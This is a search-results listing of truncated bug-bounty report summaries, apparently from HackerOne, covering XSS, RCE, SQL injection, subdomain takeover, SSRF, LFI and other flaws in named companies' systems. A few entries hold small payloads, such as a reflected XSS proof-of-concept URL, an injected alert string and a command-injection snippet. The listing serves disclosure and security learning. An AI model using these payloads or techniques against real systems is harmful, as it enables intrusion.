15369 matches found
MTN Group: Firebase Database Takeover in https://pulseradio.mtn.co.ug/
Summary: During my test , in one of the subdomain of mtn.co.ug I found firebase configuration disclosed in the source code along with apiKey and database URL . Exploiting this vulnerability attacker is able to upload malicious data in the firebase account of pulseradio.mtn.co.ug and see database...
FetLife: Stored XSS via Angular Expression injection via Subject while starting conversation with other users.
The reporter pointed out that the Subject field for sending private messages using FetLife's onsite chat was vulnerable to a stored XSS exploit, allowing people to execute potentially malicious contents on the receiving end of the message...
HackerOne: Blind Stored XSS in HackerOne's Sal 4.1.4.2149 (sal.████.com)
The page located at https://sal.██████.com/list/Activity/hour/all/0/ suffers from a Cross-site Scripting XSS vulnerability when a user has set their hostname on their machine to an XSS payload. Vulnerable Page https://sal.██████.com/list/Activity/hour/all/0/ Victim IP Address ███████ Referer...
GSA Bounty: Limited LFI
Summary: Due to improper parameter sensitization local file inclusion is possible. LFI is limited as we were not able to truncate the end of string. Description: Application root is located at /var/www/dashboard/new/public Due to URL Manipulation we are able to raed file from...
Algolia: subdomain take over at recommendation.algolia.com
Description hello sir, your subdomain recommendation.algolia.com cname is recommendation.us and recommendation.us is for sell which can lead to subdomain take over steps to reproduce 1. check the cname of recommendation.algolia.com 2. see that the cname "recommendation.us" is for sell using looku...
Mail.ru: RCE on shared.mail.ru due to "widget" plugin
Confluence widget connector vulnerable to CVE-2019-3396 was available on shared.mail.ru...
Django: Email Spoofing Possible on djangoproject.com Email Domain
Summary: Due to lacking a SPF and DMARC record it is possible to spoof emails from djangoproject.com. This could potentially be used to trick employees, customers or clients via phishing emails. Description: Mail servers rely on both SPF and DMARC to properly deal with email spoofing. SPF shows...
Semrush: Remote Code Execution on www.semrush.com/my_reports on Logo upload
The Logo upload in the report constructor at: https://www.semrush.com/myreports/constructor F340480 is passed through a not properly patched version of ImageMagick. You can use Postscript to get Ghostscript to run which in return allows to trigger arbitrary commands on the server, leading to Remo...
Zomato: [Zomato Android/iOS] Theft of user session
Hi, I'd like to report a bug which allows to theft user data even without installing third-party apps. Activity xml is exported, and can be accessed by browser. When any WebView in a client app, or a browser meets a zomato://etc URL it will automatically launch Zomato app. File...
Semrush: Email Spoofing
Hey SemRush, It appears that spoofed email can be sent from 1 of your emails. The following email is vulnerable: [email protected] Information: Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source...
Palantir Public: SQL Injection at https://files.palantir.com/ due to CVE-2021-38159
A vulnerability was discovered in an Internet-facing asset files.palantir.com. A proof of concept POC was developed and used to validate the finding. The vulnerability was patched and resolved. Blog about this vulnerability published. You can read full detail here:...
Ruby: imap: StartTLS stripping attack (CVE-2016-0772).
net/imap does not seem to raise an exception when the remote end imap server fails to respond with taggedresponse NO/BAD or OK to an explicit call of imap.starttls. This may allow a malicious MITM to perform a starttls stripping attack if the client code does not explicitly set usessl = true on...
Open-Xchange: Null dereference or redundant null check in `mail_crypt_load_global_private_key` for plugin mail-crypt
In this function, we check once if errorr is not NULL in if enctype == DCRYPTKEYENCRYPTIONTYPEPASSWORD / Fail here if password is not set since openssl will prompt for it otherwise / if keypassword == NULL if errorr != NULL errorr = tstrdupprintf"%s: %s unset, no " "password to decrypt the key",...
Node.js third-party modules: [Uppy] Internal Server side request forgery (bypass of #786956)
I would like to report Internal Server-side request forgery in Uppy It allows the attacker to easily extract information from internal servers Module module name: Uppy version:1.15.0 npm page: https://www.npmjs.com/package/uppy Module Description Uppy is a sleek, modular JavaScript file uploader...
Shopify: CSRF on connecting Paypal as Payment Provider
Hi, I think there is a weak csrf protection on adding paypal as the payment provider, but the protection is not good. When user try to add paypal as payment provider, they will make this GET request...
Mail.ru: [icq.im] Reflected XSS via chat invite link
Insufficient filtering in icq.im allowed reflected XSS via invite link...
h1-ctf: [h1-415 2020] My writeup on how to retrieve the special secret document
Summary: An attacker without any privilege is able to retrieve the special secret document, hosted on the https://h1-415.h1ctf.com website. To do so, multiple steps are required : 1. The authentication must be bypassed to have a licensed account; 2. The support team portal is vulnerable to a blin...
Internet Bug Bounty: CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
description here: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html PoC: https://github.com/q3k/cve-2019-5736-poc Some more links: https://seclists.org/oss-sec/2019/q1/119 https://access.redhat.com/security/cve/cve-2019-5736 Impact It allows to escape from container t...
AlienVault : Puplic .htaccess/.htpasswd/.canvas files leads to password disclosure.
iam a big fan of fuzzing/bruteforcing after my last submission 288533 on http://data.alienvault.com, i decided to go further, after some bruteforcing i came across this directory which looked kinda interesting for me http://data.alienvault.com/snort/ when u try to access the directory you will ge...
Gratipay: Possible User Session Hijack using Invalid HTTPS certificate on inside.gratipay.com domain
Good evening team! This is a theoretical risk but I thought it was still worth reporting since every endpoint and any data flowing through inside.gratipay.com is unencrypted. POC https://inside.gratipay.com And every sub directory under inside.gratipay.com. Description Since the certificate is on...
ExpressionEngine: Type Juggling -> PHP Object Injection -> SQL Injection Chain
Justin Kennedy identified a Type Juggling vulnerability in ExpressionEngine that allowed access to unserialize using user supplied data, ultimately achieving SQL Injection. The full details of this vulnerability can be found here:...
LocalTapiola: Remote Code Execution in NovaStor NovaBACKUP DataCenter backup software (Hiback)
Issue This report contains information about a vulnerability in NovaStor NovaBACKUP DataCenter backup software. Fix There is no immediate fix. LähiTapiola has internal network controls in place for mitigation. Reasoning The report is partially out of scope as the software in question is not...
Omise: The endpoint '/test/webhooks' is vulnerable to DNS Rebinding
Summary: DNS rebinding attack is a method of switching the resolution of domain names as wished by the attacker. The aim is to lure the web app to a different IP address/host. In this attack, and particularly in our case, a malicious server will first perform a domain name resolution to the IP...
XVIDEOS: Script breaking tag (Forces website to render blank) (Informative)
Summary: This is a bug affecting core HTML and JS elements on the site via Search Steps To Reproduce: 1. Open https://www.xvideos.com 2. Click to search enter payload= "" without quotes 3. Hit enter or search, watch the page break and not load any content content is loaded in console, renders pag...
GitHub Security Lab: [Python]: Add SqlAlchemy support for SQL injection query
This bug was reported directly to GitHub Security Lab...
Node.js: Built-in TLS module unexpectedly treats "rejectUnauthorized: undefined" as "rejectUnauthorized: false", disabling all certificate validation
NOTE! Thanks for submitting a report! Please replace all the square sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! Summary: "rejectUnauthorized: false"...
curl: Inadequate Cryptographic Key Size and Insecure Cryptographic Mode. File Name :- curl_ntlm_core.c
The application is generating cryptographic keys or key pairs using a short and inadequate length. This application is using the ECB Electronic Codebook mode of operation to perform encryption, which is considered semantically insecure. Vulnerable File name :- curlntlmcore.c Vulnerable line no. 2...
U.S. Dept Of Defense: Reflected XSS in https://www.█████/
Hello Security Team, I would like to report the XSS vulnerability on your system. Steps To Reproduce: Visit the following POC link and move your mouse allover index page: https://www.████/Z%22onmouseover=alert%60%60%20%22/████████/█████.aspx 1. Tested on firefox browser: ███████ 2.Tested on googl...
Khan Academy: CSV Injection Via Student Password/Name Leads To Client Side RCE And Reading Client Files
Insufficient CSV escaping could result in our site generating an unsafe CSV file for an end user under certain conditions. See the reporter's summary for more. Two CSV Injection Issues Was Discovered On Khan's Teacher CSV Export Function, That Could Allow Client Site Remote Code Execution, And...
Starbucks: Default credentials for the temporary POC site alipoc.stg.starbucks.com.cn permitted WAF bypass and RCE
neweq discovered that a temporary proof of concept site alipoc.stg.starbucks.com.cn was initially configured with default credentials for a brief period of time before being taken offline. @neweq — thank you for reporting this vulnerability and for confirming the resolution...
Staging.every.org: Flaw in Change Email https://youtu.be/MMvlcHIGs2A
See https://youtu.be/MMvlcHIGs2A...
Monero: Exploiting Network and Timing Side-Channels to Break Monero Receiver Anonymity
Summary: We present various examples of side-channel leakage in the communication between a Monero wallet and P2P node. Communication patterns and timing leak whether the wallet is the payee of a transaction that is sent into the transaction pool or mined in a block—thereby breaking transaction...
Grab: Leaking sensitive information on Github lead full access to all Grab Slack channels
Summary: Accidental leakage of secret keys in such code repositories is a real problem, after my report 387117, I decided to dig deeper than the previous report and looking to some random profiles in Github, and doing some dirty work I was able to access to the developer’s company’s internal chat...
U.S. Dept Of Defense: SOAP WSDL Parser SQL Code Execution
Summary: SOAP WSDL Parser SQL Code Execution Description: It was possible to parse WSDL resources and read all functions from the SOAP Admin Panel, therefor i was able to repeat the sql query with a tampered request with my own custom SQL command. i was able to extract all the database names for...
Semrush: Reflected XSS using Header Injection
Host : www.semrush.com Path : /billing-admin/profile/subscription/?l=de Payload : c5obc'+alert1+'p7yd5 Steps to reproduce : Request Header : GET /billing-admin/profile/subscription/?l=de HTTP/1.1 Host: www.semrush.com Accept: / Accept-Language: en User-Agent: Mozilla/5.0 compatible; MSIE 9.0;...
Informatica: [oneclickdrsfdc-test.informatica.com] Tomcat Example Scripts Exposed Unauthenticated
Issue The consultant identified that there is an unauthenticated installation of apache tomcat installed on the affected host. This particular installation has the /examples directory exposed which contains several scripts that execute server side code, these scripts can also be leveraged to carr...
Mars: CVE-2022-21371: Oracle WebLogic Server Local File Inclusion
A vulnerability was identified in Oracle WebLogic Server's Web Container component. Affected versions included ██████████, ██████████, ██████████, and ██████████. The vulnerability could be exploited by an unauthenticated attacker over HTTP, potentially leading to unauthorized access to critical...
Internet Bug Bounty: CVE-2023-28319: UAF in SSH sha256 fingerprint check
A use-after-free vulnerability was found in libcurl's SSH server public key verification feature, affecting versions 7.81.0 to 8.0.1. When the verification check failed, libcurl would free the memory for the fingerprint before returning an error message containing the now-freed hash, potentially...
curl: CVE-2023-28321: IDN wildcard match
An improper validation of a certificate with host mismatch vulnerability was found in curl/libcurl, which allowed an attacker to perform a man-in-the-middle attack. The vulnerability was caused by the use of wildcards for validation during TLS communication, even if the hostname is an IDN. This...
Internet Bug Bounty: CVE-2022-40127: RCE in Apache Airflow <2.4.0 bash example
airflow-2.3.3/airflow/exampledags/examplebashoperator.py has a command injection vulnerability. I can control the runid in the following codeexamplebashoperator.py,So I can inject custom commands. alsorunthis = BashOperator taskid='alsorunthis', bashcommand='echo "runid= runid | dagrun= dagrun "'...
Sifchain: SSH server due to Improper Signature Verification
I found that you are using golang.org/x/[email protected] which has a vulnerability that was fixed in this version golang.org/x/[email protected] but that vulnerability is: golang.org/x/crypto/ssh is an SSH client and server Version...
Nextcloud: Webauthn tokens are not removed on user deletion
userA has an account on serverA 2. userA enables passwordless login webauthn and registers a key/device 3. userA is removed from the system 4. a new user comes along and gets assigned userA as id 5. the old userA tries to login with their key 6. the old userA can see all data of the new userA...
GitHub Security Lab: Java: CWE-749 Unsafe resource loading in Android WebView leaking to injection attacks
This bug was reported directly to GitHub Security Lab...
Mail.ru: Bypass OTP on contact back request at https://driver.city-mobil.ru/
It was possible to bypass phone verification for support call back request...
U.S. Dept Of Defense: RCE on https://█████/ Using CVE-2017-9248
Summary: https://█████████/ is hosting an unpatched version of the Telerik DialogHandler Telerik.Web.UI.DialogHandler.aspx allowing for the machine key to be brute forced. The machine key can be used to access the DNN file manager to upload arbitrary files including ASPX giving a web shell and RC...
Internet Bug Bounty: Improper handling of Chunked data request in sapi_apache2.c leads to Reflected XSS
Hey, Chunked requests can trigger xss and html injection at any end point because the APRBRIGADEINSERTTAILbrigade, bucket is getting destroyed by other handlers. Affected versions: Any OS: Any https://bugs.php.net/bug.php?id=76 Prashanths-MacBook-Pro: prashanthvarma$ nc localhost 80 POST /lol.php...
Node.js third-party modules: [markdown-pdf] Local file reading
I would like to report local file reading in markdown-pdf It allows to insert a malicious html code, which allows to read the local files. Module module name: markdown-pdf version: 8.1.1 npm page: https://www.npmjs.com/package/markdown-pdf Module Description Node module that converts Markdown fil...
Internet Bug Bounty: Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
Hi! CVE-2017-6074 1 is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged processes. The kernel needs to be built with CONFIGIPDCCP for the vulnerability to be present. A lot of modern distributions enable this option by...
HackerOne: Invitation token leaks to https://bat.bing.com
Summary Invitation page contains iframes that points to https://b5s.hackerone-ext-content.com/!/invitations/ and https://a4l.hackerone-ext-content.com/!/invitations/. A GET request to these endpoints executes a script that points to https://bat.bing.com/bat.js. The corresponding request to bing...
Gratipay: clickjacking on https://gratipay.com/on/npm/[text]
hi team .. i found clickjacking URL on https://gratipay.com/on/npm/here this clickjacking must be 3 characturs and must be 5 number this entered endpoint of URL .. please fixed soon https://gratipay.com/on/npm/text step respond 1- go to https://gratipay.com/on/npm/text 2 - check name or number...